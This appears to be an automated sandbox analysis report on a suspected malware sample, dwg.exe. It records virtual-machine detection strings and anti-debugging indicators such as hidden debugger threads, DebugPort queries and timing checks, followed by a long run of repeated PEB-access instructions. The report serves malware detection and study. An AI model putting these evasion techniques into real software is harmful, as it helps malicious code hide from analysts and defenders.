      Source: explorer.exe, 00000005.00000000.277858620.000000000F59B000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ger_cw5n1h2txyewyF
      Source: explorer.exe, 00000005.00000000.274508758.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000005.00000000.274508758.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000005.00000000.274627577.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000005.00000002.474048022.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000005.00000000.273860626.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: dwg.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.273860626.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000005.00000000.273860626.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\dwg.exe | Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E6233 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,6DDB9555,?,321C9581
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\dwg.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exe Process queried: DebugPort
      Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E6233 rdtsc
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E3230 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E583D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E4A27 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E1870 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E2CC1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E4EF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E1D02 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E1F93 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E49AA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 0_2_021E1FD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E138E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1BFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1CAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1CAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1846A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E148EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1BFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1336CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1316E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1176E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E104F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E104F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E118794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E187794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E187794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E187794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1437F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E19C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1CE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E134D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E134D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E134D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E18A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E127D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E143D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E183540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E132581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E132581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E132581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E132581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E131DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E131DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E131DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1335A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1B8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1CFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1CFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1CFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1CFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E105210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E105210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E105210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E105210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E123A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E118A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E144A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E144A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1CEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E194257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E109240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E109240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E109240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E109240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E14927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E132ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E132AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E133B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E133B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E10DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E132397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1BD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E111B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E111B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E134BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E134BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E134BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1853CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1853CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E12DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E187016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E187016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E187016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E11B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E13002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E120050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E120050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1D1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E1C2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exe Code function: 4_2_1E109080 mov eax, dword ptr fs:[00000030h]
